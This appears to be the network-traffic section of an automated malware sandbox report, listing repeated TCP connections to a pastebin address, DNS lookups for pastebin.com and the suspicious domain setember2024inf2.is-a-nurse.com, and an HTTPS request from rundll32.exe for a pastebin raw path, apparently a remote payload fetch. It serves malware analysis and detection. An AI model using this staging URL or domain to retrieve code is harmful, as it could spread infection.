Oct 3, 2024 03:34:56.543888092 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.543893099 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.653860092 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.653918028 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.654007912 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.654329062 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.654342890 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.115712881 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.117243052 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.117244005 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.117292881 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.117631912 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.118901014 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.163407087 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.239433050 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.239571095 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.239660025 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.240205050 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.240205050 CEST	49747	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.240231991 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.240245104 CEST	443	49747	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.356494904 CEST	49748	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.356559038 CEST	443	49748	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.356645107 CEST	49748	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.356959105 CEST	49748	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.356970072 CEST	443	49748	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.806699991 CEST	49748	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.808659077 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.808757067 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:57.808928967 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.809243917 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:57.809279919 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.286752939 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.286920071 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.288114071 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.288130045 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.288368940 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.289526939 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.335401058 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.416798115 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.416892052 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.416946888 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.417078972 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.417098045 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.417114019 CEST	49749	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.417119980 CEST	443	49749	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.534400940 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.534444094 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:58.534521103 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.534822941 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:58.534837961 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.031227112 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.031470060 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.032747984 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.032778978 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.033036947 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.034302950 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.079404116 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.170280933 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.170417070 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.170619011 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.170762062 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.170779943 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.170792103 CEST	49750	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.170797110 CEST	443	49750	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.286434889 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.286485910 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.286566019 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.286875963 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.286884069 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.770426035 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.770704985 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.772044897 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.772053003 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.772286892 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.773538113 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.815403938 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.911212921 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.911325932 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.911525011 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.911614895 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.911628008 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:59.911642075 CEST	49751	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:59.911647081 CEST	443	49751	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.021729946 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.021790028 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.021882057 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.022182941 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.022203922 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.513917923 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.514194012 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.515397072 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.515410900 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.515702009 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.516938925 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.563400030 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.638179064 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.638283014 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.638330936 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.638500929 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.638515949 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.638528109 CEST	49752	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.638531923 CEST	443	49752	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.754630089 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.754683971 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:00.754786015 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.755105972 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:00.755115986 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.214277029 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.214436054 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.215945959 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.215964079 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.216234922 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.217269897 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.259412050 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.363665104 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.363763094 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.363843918 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.363953114 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.364010096 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.364042997 CEST	49753	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.364058971 CEST	443	49753	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.472155094 CEST	49754	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.472240925 CEST	443	49754	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.472328901 CEST	49754	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.472625971 CEST	49754	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.472661972 CEST	443	49754	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.837229013 CEST	49754	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.843161106 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.843271017 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:01.843348980 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.913039923 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:01.913108110 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.369352102 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.369497061 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.370836973 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.370866060 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.371206045 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.372474909 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.415426016 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.510149002 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.510255098 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.510456085 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.510548115 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.510548115 CEST	49755	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.510592937 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.510626078 CEST	443	49755	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.625274897 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.625313997 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:02.625407934 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.625714064 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:02.625725985 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.091267109 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.091434002 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.093113899 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.093128920 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.093393087 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.094676018 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.139419079 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.231492043 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.231596947 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.231681108 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.231962919 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.231981993 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.232019901 CEST	49756	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.232026100 CEST	443	49756	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.342130899 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.342242002 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.342370987 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.342817068 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.342845917 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.820302963 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.820544958 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.822336912 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.822365999 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.822658062 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.824026108 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.867409945 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.968614101 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.968715906 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.968820095 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.968966961 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.968987942 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:03.969003916 CEST	49757	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:03.969011068 CEST	443	49757	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.090920925 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.090977907 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.091061115 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.091353893 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.091367006 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.614329100 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.614640951 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.616250038 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.616274118 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.616501093 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.617619991 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.659420013 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.744081974 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.744173050 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.744230986 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.744573116 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.744596958 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.744610071 CEST	49758	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.744615078 CEST	443	49758	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.855129004 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.855179071 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:04.855252981 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.855647087 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:04.855659008 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.332176924 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.332262993 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.333978891 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.333991051 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.334302902 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.336008072 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.379400969 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.461426020 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.461517096 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.461608887 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.461869001 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.461885929 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.461904049 CEST	49759	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.461909056 CEST	443	49759	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.577871084 CEST	49760	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.577904940 CEST	443	49760	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.578005075 CEST	49760	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.578375101 CEST	49760	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.578385115 CEST	443	49760	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.798095942 CEST	49760	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.801079988 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.801136017 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:05.801203012 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.801804066 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:05.801824093 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.266519070 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.266596079 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.268007994 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.268029928 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.268279076 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.269432068 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.311419010 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.399880886 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.399975061 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.400028944 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.406460047 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.406495094 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:06.406511068 CEST	49761	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:06.406517982 CEST	443	49761	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.409399986 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.409503937 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.409790039 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.410162926 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.410197020 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.874690056 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.874906063 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.876414061 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.876444101 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.876686096 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:07.878078938 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:07.919419050 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.017738104 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.017853022 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.017915964 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.018151045 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.018193007 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.018220901 CEST	49762	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.018235922 CEST	443	49762	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.129671097 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.129746914 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.129848003 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.130168915 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.130187988 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.597574949 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.597644091 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.599284887 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.599297047 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.599575043 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.601003885 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.647392988 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.745737076 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.745837927 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.745893955 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.746332884 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.746350050 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.746365070 CEST	49763	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.746371031 CEST	443	49763	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.858715057 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.858808041 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:08.858915091 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.859235048 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:08.859265089 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.325032949 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.325215101 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.329365015 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.329375029 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.329675913 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.331237078 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.371401072 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.467848063 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.467950106 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.468003988 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.468219042 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.468236923 CEST	443	49764	104.20.3.235	192.168.2.10
Oct 3, 2024 03:35:09.468252897 CEST	49764	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:35:09.468257904 CEST	443	49764	104.20.3.235	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 03:34:37.058437109 CEST	52629	53	192.168.2.10	1.1.1.1
Oct 3, 2024 03:34:37.479475021 CEST	53	52629	1.1.1.1	192.168.2.10
Oct 3, 2024 03:34:37.860485077 CEST	64119	53	192.168.2.10	1.1.1.1
Oct 3, 2024 03:34:37.867645979 CEST	53	64119	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 03:34:37.058437109 CEST	192.168.2.10	1.1.1.1	0x1d4e	Standard query (0)	setember2024inf2.is-a-nurse.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:34:37.860485077 CEST	192.168.2.10	1.1.1.1	0xe94a	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 03:34:37.479475021 CEST	1.1.1.1	192.168.2.10	0x1d4e	No error (0)	setember2024inf2.is-a-nurse.com	208.109.246.134	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:34:37.867645979 CEST	1.1.1.1	192.168.2.10	0xe94a	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:34:37.867645979 CEST	1.1.1.1	192.168.2.10	0xe94a	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:34:37.867645979 CEST	1.1.1.1	192.168.2.10	0xe94a	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49723	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:38 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
